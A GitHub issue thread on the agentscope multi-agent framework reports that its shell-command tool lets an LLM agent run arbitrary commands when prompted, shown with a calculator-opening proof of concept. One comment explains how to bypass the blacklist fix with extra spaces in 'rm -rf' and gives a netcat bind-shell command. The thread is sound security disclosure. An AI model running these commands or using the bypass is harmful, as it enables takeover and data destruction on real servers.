[Bug]: Security bug: Arbitrary code execution

modelscope / agentscope

Start building LLM-empowered multi-agent applications in an easier way.

https://doc.agentscope.io/

Apache License 2.0

5.36k stars 330 forks source link

[Bug]: Security bug: Arbitrary code execution #411

Closed SecureMPro closed 3 months ago

SecureMPro commented 3 months ago

Describe the bug Security bug: Arbitrary code execution

To Reproduce Hello Developer,

I have noticed that agentscope does not implement security measures to isolate the execution of user-provided code, which could lead to the takeover of the server running the code.

For instance, when I used the following prompt to execute code, agentscope directly opened the calculator on my computer:

agentscope.init(model_configs="./1.json")

service_toolkit = ServiceToolkit()
service_toolkit.add(execute_shell_command)

agent = ReActAgent(
    name="assistant",
    model_config_name="testll",
    verbose=True,
    service_toolkit=service_toolkit,
    max_iters=1,
)

msg = Msg("user", "help me to execute the following command: open -a calculator", role="user")
agent(msg)

If I were to execute malicious code, this could seriously compromise server security.

DavdGao commented 3 months ago

I agree. Blocking dangerous commands is required in the service function, and we will fix it as soon as possible.

zpbrent commented 3 months ago

Hello, I find the current patch that applies a black-list to filter out dangerous commands can be simply bypassed. For example, the attackers can run rm --rf (note that there are more than one space character in between the rm and -rf) to bypass the check as the blocked item only has one space in between. Moreover, the current black-list also overlooked many other dangerous commands such as netcat, the hackers can simply create a backdoor by the command nc -lvvp 6666 -e /bin/sh to enable a remote shell and then log into the victim system to run arbitrary commands as follows.

To my knowledge, it is better to defend here with a customized white-list approach. The default white-list is empty that can prevent running any commands by default. Meanwhile exposing a new API function that enables the agentscope users to modify the white-list and thus can customize which commands they permit in their own agent applications.

DavdGao commented 3 months ago

@zpbrent Indeed, it's very difficult to enumerate all attacks, and I can think of many ways to bypass these defenses (e.g. asking agent to directly run an unkonwn shell file). White list is a good compromise, and we will add it as soon as possible.

DavdGao commented 3 months ago

@zpbrent but the question is whether it is too strict to allow only whitelisted commands? It maybe also difficult to list all whitelisted commands just before executing certain tasks.

zpbrent commented 3 months ago

@DavdGao Yes, so I think the white-list is customized, which allows the application level uers to specify which commands they permit to execute. The agentscope can just release an additional API out to let the application level uers able to modify the white-list.